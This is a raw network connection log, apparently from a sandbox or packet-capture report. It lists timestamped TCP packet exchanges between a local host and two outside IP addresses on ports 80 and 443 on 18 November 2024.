                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.880021095 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.880474091 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.880532980 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.880543947 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.880558014 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.880588055 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.880601883 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.880836964 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.880897999 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.880912066 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.880942106 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.880968094 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.881057978 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.881072044 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.881133080 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.881696939 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.881747961 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.881762028 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.881797075 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.881817102 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.884031057 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.884094000 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.884160995 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.999110937 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.999140978 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.999154091 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.999222994 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.999249935 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.999272108 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.999284029 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.999296904 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.999324083 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.999353886 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.999454021 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.999465942 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.999476910 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.999494076 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.999505997 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.999538898 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.999694109 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.999738932 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.999764919 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.999778032 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.999833107 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.999861956 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.999872923 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.999886036 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.999913931 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.999933004 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.000010967 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.000025034 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.000039101 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.000097990 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.000255108 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.000268936 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.000281096 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.000292063 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.000293970 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.000303030 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.000340939 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.000520945 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.000533104 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.000545025 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.000564098 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.000611067 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.000720024 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.000762939 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.000808954 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.000822067 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.000833988 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.000854969 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.000880003 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.000946045 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.001003981 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.001015902 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.001029968 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.001040936 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.001054049 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.001061916 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.001066923 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.001092911 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.001132965 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.001333952 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.001389027 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.001430035 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.001442909 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.001482010 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.001497030 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.001581907 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.001602888 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.001616001 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.001627922 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.001630068 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.001641989 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.001667976 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.001682997 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.002008915 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.002022028 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.002032995 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.002044916 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.002057076 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.002057076 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.002080917 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.002119064 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.043479919 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.043555021 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.043567896 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.043621063 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.043654919 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.120126009 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.120171070 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.120188951 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.120244026 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.120300055 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.120321989 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.120346069 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.120358944 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.120368004 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.120371103 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.120426893 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.120455980 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.120578051 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.120645046 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.120717049 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.120729923 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.120742083 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.120753050 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.120767117 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.120769024 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.120779037 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.120800018 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.120846987 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.121104002 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.121117115 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.121157885 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.121185064 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.121705055 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.121718884 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.121731997 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.121745110 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.121757030 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.121763945 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.121769905 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.121783972 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.121797085 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.121805906 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.121809959 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.121822119 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.121830940 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.121834993 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.121850014 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.121861935 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.121881008 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.121881008 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.121936083 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.122514009 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.122528076 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.122539997 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.122553110 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.122570992 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:19.122600079 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:23.785815954 CET8049730107.172.44.178192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:23.785984993 CET4973080192.168.2.4107.172.44.178
                                                                                                                                                                                                                            Nov 18, 2024 18:37:24.914846897 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:24.914891005 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:24.914968014 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:24.926203966 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:24.926214933 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:25.794078112 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:25.794260025 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:25.798046112 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:25.798053980 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:25.798278093 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:25.817361116 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:25.859338045 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:25.981722116 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:25.982225895 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:25.982234001 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:25.982351065 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:25.982357979 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:25.982409954 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.101891041 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.102154970 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.102165937 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.103127956 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.103214025 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.103219986 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.104238987 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.104463100 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.104473114 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.105608940 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.105693102 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.105700016 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.160228968 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.222095013 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.222106934 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.222325087 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.222335100 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.222400904 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.222481012 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.222527027 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.222534895 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.222549915 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.223102093 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.223212957 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.223218918 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.223737001 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.223838091 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.223843098 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.224308014 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.224417925 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.224423885 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.224699020 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.224745989 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.224761009 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.224765062 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.224807978 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.224813938 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.225054979 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.226825953 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.226924896 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.226928949 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.227221012 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.227291107 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.227296114 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.269546986 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.342235088 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.342359066 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.342366934 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.342566013 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.342678070 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.342684031 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.343040943 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.343096018 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.343107939 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.343512058 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.343586922 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.343606949 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.344234943 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.344285965 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.344302893 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.344309092 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.344341993 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.345047951 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.345120907 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.345124960 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.345886946 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.345932961 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.345964909 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.345976114 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.346002102 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.346864939 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.346904993 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.346929073 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.346947908 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.346967936 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.347870111 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.347912073 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.347934008 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.347943068 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.347965002 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.348767042 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.348838091 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.348860025 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.348864079 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.349150896 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.349661112 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.349744081 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.349752903 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.394548893 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.462008953 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.462110996 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.462126017 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.462177992 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.462254047 CET49731443192.168.2.4142.215.209.78
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.462260008 CET44349731142.215.209.78192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:37:26.463196993 CET44349731142.215.209.78192.168.2.4
